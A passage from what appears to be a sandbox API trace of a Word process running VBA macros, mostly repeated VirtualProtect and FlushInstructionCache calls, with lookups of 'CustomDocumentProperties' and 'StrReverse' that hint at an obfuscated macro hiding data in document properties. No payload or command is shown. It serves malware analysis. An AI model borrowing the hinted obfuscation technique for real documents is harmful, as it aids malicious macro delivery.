flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0109.892] GetCurrentProcess () returned 0xffffffff [0109.893] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0069, dwSize=0x2) returned 1 [0109.893] GetCurrentProcess () returned 0xffffffff [0109.893] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0088, dwSize=0x14) returned 1 [0109.893] VirtualProtect (in: lpAddress=0xf5d0088, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0109.893] GetCurrentProcess () returned 0xffffffff [0109.893] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0089, dwSize=0x2) returned 1 [0109.893] GetCurrentProcess () returned 0xffffffff [0109.893] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d00a8, dwSize=0x14) returned 1 [0109.893] VirtualProtect (in: lpAddress=0xf5d00a8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0109.894] GetCurrentProcess () returned 0xffffffff [0109.894] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d00a9, dwSize=0x2) returned 1 [0109.894] GetCurrentProcess () returned 0xffffffff [0109.894] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d00c8, dwSize=0x14) returned 1 [0109.894] VirtualProtect (in: lpAddress=0xf5d00c8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0109.894] GetCurrentProcess () returned 0xffffffff [0109.894] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d00c9, dwSize=0x2) returned 1 [0109.894] GetCurrentProcess () returned 0xffffffff [0109.894] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d00e8, dwSize=0x14) returned 1 [0109.894] VirtualProtect (in: lpAddress=0xf5d00e8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0109.895] GetCurrentProcess () returned 0xffffffff [0109.895] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d00e9, dwSize=0x2) returned 1 [0109.895] GetCurrentProcess () returned 0xffffffff [0109.895] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0108, dwSize=0x14) returned 1 [0109.895] VirtualProtect (in: lpAddress=0xf5d0108, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0109.895] GetCurrentProcess () returned 0xffffffff [0109.895] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0109, dwSize=0x2) returned 1 [0109.895] GetCurrentProcess () returned 0xffffffff [0109.895] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0128, dwSize=0x14) returned 1 [0109.895] VirtualProtect (in: lpAddress=0xf5d0128, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0109.896] GetCurrentProcess () returned 0xffffffff [0109.896] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0129, dwSize=0x2) returned 1 [0109.896] GetCurrentProcess () returned 0xffffffff [0109.896] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0148, dwSize=0x14) returned 1 [0109.896] VirtualProtect (in: lpAddress=0xf5d0148, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0109.896] GetCurrentProcess () returned 0xffffffff [0109.896] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0149, dwSize=0x2) returned 1 [0109.896] GetCurrentProcess () returned 0xffffffff [0109.896] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0168, dwSize=0x14) returned 1 [0109.896] VirtualProtect (in: lpAddress=0xf5d0168, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0109.897] GetCurrentProcess () returned 0xffffffff [0109.897] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0169, dwSize=0x2) returned 1 [0109.897] GetCurrentProcess () returned 0xffffffff [0109.897] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0188, dwSize=0x14) returned 1 [0109.897] VirtualProtect (in: lpAddress=0xf5d0188, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0109.897] GetCurrentProcess () returned 0xffffffff [0109.897] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0189, dwSize=0x2) returned 1 [0109.897] GetCurrentProcess () returned 0xffffffff [0109.897] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d01a8, dwSize=0x14) returned 1 [0109.897] VirtualProtect (in: lpAddress=0xf5d01a8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0109.898] GetCurrentProcess () returned 0xffffffff [0109.898] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d01a9, dwSize=0x2) returned 1 [0109.898] GetCurrentProcess () returned 0xffffffff [0109.898] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d01c8, dwSize=0x14) returned 1 [0109.898] VirtualProtect (in: lpAddress=0xf5d01c8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0109.898] GetCurrentProcess () returned 0xffffffff [0109.898] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d01c9, dwSize=0x2) returned 1 [0109.898] GetCurrentProcess () returned 0xffffffff [0109.898] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d01e8, dwSize=0x14) returned 1 [0109.898] VirtualProtect (in: lpAddress=0xf5d01e8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0109.899] GetCurrentProcess () returned 0xffffffff [0109.899] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d01e9, dwSize=0x2) returned 1 [0109.899] GetCurrentProcess () returned 0xffffffff [0109.899] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0208, dwSize=0x14) returned 1 [0109.899] VirtualProtect (in: lpAddress=0xf5d0208, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0109.899] GetCurrentProcess () returned 0xffffffff [0109.899] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0209, dwSize=0x2) returned 1 [0109.899] GetCurrentProcess () returned 0xffffffff [0109.899] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0228, dwSize=0x14) returned 1 [0109.899] VirtualProtect (in: lpAddress=0xf5d0228, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0109.900] GetCurrentProcess () returned 0xffffffff [0109.900] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0229, dwSize=0x2) returned 1 [0109.900] GetCurrentProcess () returned 0xffffffff [0109.900] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc8b4868, dwSize=0x14) returned 1 [0109.900] VirtualProtect (in: lpAddress=0xc8b4868, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0109.900] GetCurrentProcess () returned 0xffffffff [0109.900] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc8b4869, dwSize=0x2) returned 1 [0109.900] GetCurrentProcess () returned 0xffffffff [0109.900] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc8b4888, dwSize=0x14) returned 1 [0109.900] VirtualProtect (in: lpAddress=0xc8b4888, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0109.901] GetCurrentProcess () returned 0xffffffff [0109.901] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc8b4889, dwSize=0x2) returned 1 [0109.901] GetCurrentProcess () returned 0xffffffff [0109.901] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc8b48a8, dwSize=0x14) returned 1 [0109.901] VirtualProtect (in: lpAddress=0xc8b48a8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0109.901] GetCurrentProcess () returned 0xffffffff [0109.901] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc8b48a9, dwSize=0x2) returned 1 [0109.902] GetAsyncKeyState (vKey=3) returned 0 [0109.902] CRetailMalloc_Alloc () returned 0xcb5e8e0 [0109.902] memcpy (in: _Dst=0xd015168, _Src=0x197888, _Size=0x4 | out: _Dst=0xd015168) returned 0xd015168 [0109.903] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x11302cb6, cbMultiByte=15, lpWideCharStr=0x1976a4, cchWideChar=16 | out: lpWideCharStr="ActiveDocument") returned 15 [0109.903] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x111e29f2, cbMultiByte=15, lpWideCharStr=0x197704, cchWideChar=16 | out: lpWideCharStr="ActiveDocument") returned 15 [0109.903] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x111e29f2, cbMultiByte=15, lpWideCharStr=0x197704, cchWideChar=16 | out: lpWideCharStr="ActiveDocument") returned 15 [0109.911] CRetailMalloc_Alloc () returned 0xc877c38 [0109.911] CRetailMalloc_Realloc () returned 0xcb1d988 [0109.911] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x111e29f2, cbMultiByte=15, lpWideCharStr=0x1976c4, cchWideChar=16 | out: lpWideCharStr="ActiveDocument") returned 15 [0109.911] CRetailMalloc_Realloc () returned 0xc8cd150 [0109.913] CRetailMalloc_Realloc () returned 0xcb3d2b0 [0109.913] memcpy (in: _Dst=0xd01516c, _Src=0x197888, _Size=0x4 | out: _Dst=0xd01516c) returned 0xd01516c [0109.913] CRetailMalloc_Alloc () returned 0xc877b18 [0109.914] CRetailMalloc_Realloc () returned 0xcb2f8f0 [0109.914] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x111e2a1e, cbMultiByte=25, lpWideCharStr=0x1976dc, cchWideChar=26 | out: lpWideCharStr="CustomDocumentProperties") returned 25 [0109.914] CRetailMalloc_Realloc () returned 0xc830430 [0109.914] memcpy (in: _Dst=0xd015168, _Src=0x197888, _Size=0x4 | out: _Dst=0xd015168) returned 0xd015168 [0109.915] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x11302ce2, cbMultiByte=11, lpWideCharStr=0x1976a4, cchWideChar=12 | out: lpWideCharStr="StrReverse") returned 11 [0109.915] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x111e29ca, cbMultiByte=11, lpWideCharStr=0x197704, cchWideChar=12 | out: lpWideCharStr="StrReverse") returned 11 [0109.920] CRetailMalloc_Realloc () returned 0xc832470 [0109.921] CRetailMalloc_Realloc () returned 0xb25c7b8 [0109.921] CRetailMalloc_Realloc () returned 0xf616790 [0109.921] memcpy (in: _Dst=0xd015168, _Src=0x197888, _Size=0x4 | out: _Dst=0xd015168) returned 0xd015168 [0109.921] CRetailMalloc_Realloc () returned 0xcb3ca10 [0109.921] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x6961ded0, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0109.922] CRetailMalloc_Realloc () returned 0xcb5f0f0 [0109.922] memcpy (in: _Dst=0xcb5e940, _Src=0x197924, _Size=0x18 | out: _Dst=0xcb5e940) returned 0xcb5e940 [0109.922] CRetailMalloc_Realloc () returned 0xcb5e8e0 [0109.922] CRetailMalloc_Free () returned 0x1 [0109.922] GetCurrentProcess () returned 0xffffffff [0109.922] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601714, dwSize=0x14) returned 1 [0109.922] VirtualProtect (in: lpAddress=0xf601714, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0109.923] GetCurrentProcess () returned 0xffffffff [0109.923] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601715, dwSize=0x2) returned 1 [0109.923] GetCurrentProcess () returned 0xffffffff [0109.923] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601734, dwSize=0x14) returned 1 [0109.923] VirtualProtect (in: lpAddress=0xf601734, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0109.923] GetCurrentProcess () returned 0xffffffff [0109.923] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601735, dwSize=0x2) returned 1 [0109.923] GetCurrentProcess () returned 0xffffffff [0109.923] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601754, dwSize=0x14) returned 1 [0109.923] VirtualProtect (in: lpAddress=0xf601754, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0109.924] GetCurrentProcess () returned 0xffffffff [0109.924] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601755, dwSize=0x2) returned 1 [0109.924] GetCurrentProcess () returned 0xffffffff [0109.924] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601774, dwSize=0x14) returned 1 [0109.924] VirtualProtect (in: lpAddress=0xf601774, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0109.924] GetCurrentProcess () returned 0xffffffff [0109.924] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601775, dwSize=0x2) returned 1 [0109.924] GetCurrentProcess () returned 0xffffffff [0109.924] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601794, dwSize=0x14) returned 1 [0109.924] VirtualProtect (in: lpAddress=0xf601794, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0109.925] GetCurrentProcess () returned 0xffffffff [0109.925] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601795, dwSize=0x2) returned 1 [0109.925] GetCurrentProcess () returned 0xffffffff [0109.925] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf6017b4, dwSize=0x14) returned 1 [0109.925] VirtualProtect (in: lpAddress=0xf6017b4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0109.925] GetCurrentProcess () returned 0xffffffff [0109.925] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf6017b5, dwSize=0x2) returned 1 [0109.926] GetCurrentProcess () returned 0xffffffff [0109.926] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf6017d4, dwSize=0x14) returned 1 [0109.926] VirtualProtect (in: lpAddress=0xf6017d4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0109.926] GetCurrentProcess () returned 0xffffffff [0109.926] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf6017d5, dwSize=0x2) returned 1 [0109.926] GetCurrentProcess () returned 0xffffffff [0109.926] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf6017f4, dwSize=0x14) returned 1 [0109.926] VirtualProtect (in: lpAddress=0xf6017f4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0109.927] GetCurrentProcess () returned 0xffffffff [0109.927] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf6017f5, dwSize=0x2) returned 1 [0109.927] GetCurrentProcess () returned 0xffffffff [0109.927] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601814, dwSize=0x14) returned 1 [0109.927] VirtualProtect (in: lpAddress=0xf601814, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0109.927] GetCurrentProcess () returned 0xffffffff [0109.927] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601815, dwSize=0x2) returned 1 [0109.927] GetCurrentProcess () returned 0xffffffff [0109.927] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601834, dwSize=0x14) returned 1 [0109.927] VirtualProtect (in: lpAddress=0xf601834, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0109.928] GetCurrentProcess () returned 0xffffffff [0109.928] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601835, dwSize=0x2) returned 1 [0109.928] GetCurrentProcess () returned 0xffffffff [0109.928] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601854, dwSize=0x14) returned 1 [0109.928] VirtualProtect (in: lpAddress=0xf601854, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0109.928] GetCurrentProcess () returned 0xffffffff [0109.928] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601855, dwSize=0x2) returned 1 [0109.928] GetCurrentProcess () returned 0xffffffff [0109.928] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601874, dwSize=0x14) returned 1 [0109.928] VirtualProtect (in: lpAddress=0xf601874, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0109.929] GetCurrentProcess () returned 0xffffffff [0109.929] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601875, dwSize=0x2) returned 1 [0109.929] GetCurrentProcess () returned 0xffffffff [0109.929] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0048, dwSize=0x14) returned 1 [0109.929] VirtualProtect (in: lpAddress=0xf5d0048, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0109.929] GetCurrentProcess () returned 0xffffffff [0109.929] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0049, dwSize=0x2) returned 1 [0109.929] GetCurrentProcess () returned 0xffffffff [0109.929] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0068, dwSize=0x14) returned 1 [0109.929] VirtualProtect (in: lpAddress=0xf5d0068, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0109.930] GetCurrentProcess () returned 0xffffffff [0109.930] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0069, dwSize=0x2) returned 1 [0109.930] GetCurrentProcess () returned 0xffffffff [0109.930] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0088, dwSize=0x14) returned 1 [0109.930] VirtualProtect (in: lpAddress=0xf5d0088, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0109.930] GetCurrentProcess () returned 0xffffffff [0109.930] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0089, dwSize=0x2) returned 1 [0109.930] GetCurrentProcess () returned 0xffffffff [0109.930] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d00a8, dwSize=0x14) returned 1 [0109.930] VirtualProtect (in: lpAddress=0xf5d00a8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0109.931] GetCurrentProcess () returned 0xffffffff [0109.931] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d00a9, dwSize=0x2) returned 1 [0109.931] GetCurrentProcess () returned 0xffffffff [0109.931] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d00c8, dwSize=0x14) returned 1 [0109.931] VirtualProtect (in: lpAddress=0xf5d00c8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0109.931] GetCurrentProcess () returned 0xffffffff [0109.931] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d00c9, dwSize=0x2) returned 1 [0109.931] GetCurrentProcess () returned 0xffffffff [0109.931] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d00e8, dwSize=0x14) returned 1 [0109.931] VirtualProtect (in: lpAddress=0xf5d00e8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0109.932] GetCurrentProcess () returned 0xffffffff [0109.932] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d00e9, dwSize=0x2) returned 1 [0109.932] GetCurrentProcess () returned 0xffffffff [0109.932] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0108, dwSize=0x14) returned 1 [0109.932] VirtualProtect (in: lpAddress=0xf5d0108, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0109.933] GetCurrentProcess () returned 0xffffffff [0109.933] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0109, dwSize=0x2) returned 1 [0109.933] GetCurrentProcess () returned 0xffffffff [0109.933] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0128, dwSize=0x14) returned 1 [0109.933] VirtualProtect (in: lpAddress=0xf5d0128, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0109.933] GetCurrentProcess () returned 0xffffffff [0109.933] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0129, dwSize=0x2) returned 1 [0109.933] GetCurrentProcess () returned 0xffffffff [0109.933] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0148, dwSize=0x14) returned 1 [0109.933] VirtualProtect (in: lpAddress=0xf5d0148, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0109.934] GetCurrentProcess () returned 0xffffffff [0109.934] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0149, dwSize=0x2) returned 1 [0109.934] GetCurrentProcess () returned 0xffffffff [0109.934] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0168, dwSize=0x14) returned 1 [0109.935] VirtualProtect (in: lpAddress=0xf5d0168, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0109.935] GetCurrentProcess () returned 0xffffffff [0109.935] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0169, dwSize=0x2) returned 1 [0109.935] GetCurrentProcess () returned 0xffffffff [0109.935] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0188, dwSize=0x14) returned 1 [0109.935] VirtualProtect (in: lpAddress=0xf5d0188, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0109.935] GetCurrentProcess () returned 0xffffffff [0109.935] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0189, dwSize=0x2) returned 1 [0109.935] GetCurrentProcess () returned 0xffffffff [0109.936] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d01a8, dwSize=0x14) returned 1 [0109.936] VirtualProtect (in: lpAddress=0xf5d01a8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0109.936] GetCurrentProcess () returned 0xffffffff [0109.936] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d01a9, dwSize=0x2) returned 1 [0109.936] GetCurrentProcess () returned 0xffffffff [0109.936] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d01c8, dwSize=0x14) returned 1 [0109.936] VirtualProtect (in: lpAddress=0xf5d01c8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0109.936] GetCurrentProcess () returned 0xffffffff [0109.936] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d01c9, dwSize=0x2) returned 1 [0109.936] GetCurrentProcess () returned 0xffffffff [0109.937] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d01e8, dwSize=0x14) returned 1 [0109.937] VirtualProtect (in: lpAddress=0xf5d01e8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0109.937] GetCurrentProcess () returned 0xffffffff [0109.937] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d01e9, dwSize=0x2) returned 1 [0109.937] GetCurrentProcess () returned 0xffffffff [0109.937] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0208, dwSize=0x14) returned 1 [0109.937] VirtualProtect (in: lpAddress=0xf5d0208, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0109.937] GetCurrentProcess () returned 0xffffffff [0109.937] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0209, dwSize=0x2) returned 1 [0109.938] GetCurrentProcess () returned 0xffffffff [0109.938] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0228, dwSize=0x14) returned 1 [0109.939] VirtualProtect (in: lpAddress=0xf5d0228, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0109.940] GetCurrentProcess () returned 0xffffffff [0109.940] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0229, dwSize=0x2) returned 1 [0109.940] GetCurrentProcess () returned 0xffffffff [0109.940] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc8b4868, dwSize=0x14) returned 1 [0109.940] VirtualProtect (in: lpAddress=0xc8b4868, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0109.940] GetCurrentProcess () returned 0xffffffff [0109.940] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc8b4869, dwSize=0x2) returned 1 [0109.940] GetCurrentProcess () returned 0xffffffff [0109.940] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc8b4888, dwSize=0x14) returned 1 [0109.940] VirtualProtect (in: lpAddress=0xc8b4888, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0109.941] GetCurrentProcess () returned 0xffffffff [0109.941] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc8b4889, dwSize=0x2) returned 1 [0109.941] GetCurrentProcess () returned 0xffffffff [0109.941] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc8b48a8, dwSize=0x14) returned 1 [0109.941] VirtualProtect (in: lpAddress=0xc8b48a8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0109.941] GetCurrentProcess () returned 0xffffffff [0109.941] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc8b48a9, dwSize=0x2) returned 1 [0109.941] SetErrorMode (uMode=0x8001) returned 0x8001 [0109.942] _stricmp (_Str1="VBE7.DLL", _Str2="VBE6.DLL") returned 1 [0109.942] LoadLibraryA (lpLibFileName="VBE7.DLL") returned 0x693e0000 [0109.942] SetErrorMode (uMode=0x8001) returned 0x8001 [0109.942] GetProcAddress (hModule=0x693e0000, lpProcName=0x2c9) returned 0x695efe55 [0109.943] GetAsyncKeyState (vKey=3) returned 0 [0110.254] GetAsyncKeyState (vKey=3) returned 0 [0110.254] CRetailMalloc_Alloc () returned 0xcb3dca8 [0110.254] memcpy (in: _Dst=0xd015168, _Src=0x1978a8, _Size=0x4 | out: _Dst=0xd015168) returned 0xd015168 [0110.254] memcpy (in: _Dst=0xd015270, _Src=0x1978c4, _Size=0xc | out: _Dst=0xd015270) returned 0xd015270 [0110.254] memcpy (in: _Dst=0xd015168, _Src=0x197714, _Size=0x4 | out: _Dst=0xd015168) returned 0xd015168 [0110.254] memcpy (in: _Dst=0xd015168, 